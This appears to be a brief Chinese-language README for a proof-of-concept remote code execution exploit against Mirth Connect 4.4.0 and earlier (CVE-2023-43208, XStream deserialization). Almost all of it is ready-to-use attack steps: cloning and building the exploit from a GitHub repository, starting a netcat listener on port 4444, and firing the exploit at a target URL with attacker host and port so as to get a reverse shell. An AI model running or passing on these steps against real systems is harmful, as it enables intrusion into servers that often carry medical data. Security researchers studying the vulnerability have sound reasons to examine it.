适用于 Mirth Connect 远程代码执行 (RCE) 的 PoC 影响 Mirth Connect <= 4.4.0 版本,通过 XStream 反序列化实现。
git clone https://github.com/Pegasus0xx/CVE-2023-43208.git && \
cd CVE-2023-43208 && \
make
./exploit <URL> <LHOST> <LPORT>
nc -lvnp 4444
./exploit https://target.com 10.10.10.10 4444